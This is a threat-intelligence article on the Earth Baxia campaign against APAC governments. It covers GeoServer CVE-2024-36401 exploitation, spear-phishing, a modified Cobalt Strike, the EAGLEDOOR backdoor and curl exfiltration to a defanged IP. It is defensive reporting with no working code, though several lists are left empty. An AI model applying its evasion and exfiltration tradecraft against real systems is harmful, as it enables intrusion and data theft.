In a sophisticated campaign, threat actor Earth Baxia, likely based in China, has targeted government organizations and industries across the Asia-Pacific (APAC) region. Leveraging spear-phishing emails and exploiting a critical vulnerability in GeoServer (tracked as CVE-2024-36401), Earth Baxia has successfully infiltrated systems and deployed customized malware to exfiltrate sensitive data. The campaign, which began in July 2024, primarily targeted government, energy, and telecommunication sectors in Taiwan, Vietnam, South Korea, and the Philippines, but likely affected additional countries.
CVE-2024-36401 is a remote code execution (RCE) vulnerability found in GeoServer, an open-source server for sharing geospatial data. Earth Baxia exploited this vulnerability to download malicious components using commands like curl and scp, executing arbitrary commands and introducing malware into compromised environments. This vulnerability allowed Earth Baxia to gain initial access to target systems, marking the beginning of their attack chain.
In addition to exploiting GeoServer, Earth Baxia employed spear-phishing to further their attacks. Beginning in August 2024, victims received tailored phishing emails containing malicious attachments, such as MSC files or ZIP files, which dropped the next stage of malware. These emails were designed to bypass detection and lure victims into downloading and executing malicious files. Once opened, the files initiated the execution of obfuscated VBScript, leading to the download of additional payloads from cloud services such as Amazon Web Services (AWS).
Once inside a system, Earth Baxia deployed a customized version of Cobalt Strike, a well-known post-exploitation tool often used for command-and-control (C2) operations. The altered Cobalt Strike version used by Earth Baxia had modified internal signatures and a changed configuration structure, helping it avoid detection by traditional security tools.
Additionally, Earth Baxia introduced a new backdoor called EAGLEDOOR, which supports multiple communication protocols including DNS, HTTP, TCP, and Telegram. This backdoor enables the attackers to gather information, deliver further payloads, and maintain persistent access to compromised systems. EAGLEDOOR used techniques like DLL side-loading to execute its malicious code in memory, complicating detection and analysis.
Based on telemetry data and the use of specific tools and techniques, researchers have attributed this campaign to Earth Baxia, a China-linked advanced persistent threat (APT) group. Indicators such as the use of Cobalt Strike watermarks, infrastructure hosted on Alibaba Cloud, and malware samples submitted from China further suggest that this group operates from within the region. Earth Baxia’s previous campaigns have shown a focus on the government, energy, and telecommunications sectors, aligning with the victims identified in this campaign.
The attack chain followed by Earth Baxia in this campaign can be summarized as:
EAGLEDOOR is a backdoor that allows Earth Baxia to maintain control over compromised systems. It supports four communication methods:
getFile
, getUpdates
, sendDocument
, and sendMessage
.By employing multiple protocols, EAGLEDOOR can adapt its communication to the environment, making it harder for security tools to block or detect the traffic. Earth Baxia further obscures their activity by hosting malicious files on public cloud services, allowing them to easily update payloads and avoid detection.
After compromising systems, Earth Baxia exfiltrated data using curl, sending it to servers hosted at IP addresses like 152[.]42[.]243[.]170. The stolen data was archived before exfiltration, and the exfiltration process was often disguised as legitimate traffic to evade detection. The use of cloud services and dynamic payload delivery made it difficult for defenders to trace the group’s activities.
Earth Baxia primarily targeted government organizations and energy industries in the APAC region, including countries like Taiwan, Vietnam, South Korea, and the Philippines. The group’s campaigns were also detected in China, where they leveraged simplified Chinese decoy documents. Given the group’s operational focus, it is likely that the targeted sectors were of strategic importance to China’s national interests.
To defend against campaigns like the one conducted by Earth Baxia, organizations should implement a multi-layered defense strategy, including:
Earth Baxia continues to demonstrate its ability to conduct sophisticated attacks, combining spear-phishing, exploited vulnerabilities, and customized malware to infiltrate critical sectors in the APAC region. By leveraging public cloud services and multi-protocol backdoors like EAGLEDOOR, the group has shown advanced capabilities in evading detection and maintaining persistence within compromised environments. Vigilance and proactive security measures are essential to counter such threats, particularly for organizations operating in high-risk sectors.
By staying informed of these evolving tactics and employing multi-layered defense solutions, organizations can better protect themselves from supply chain attacks and advanced persistent threats (APTs) like Earth Baxia.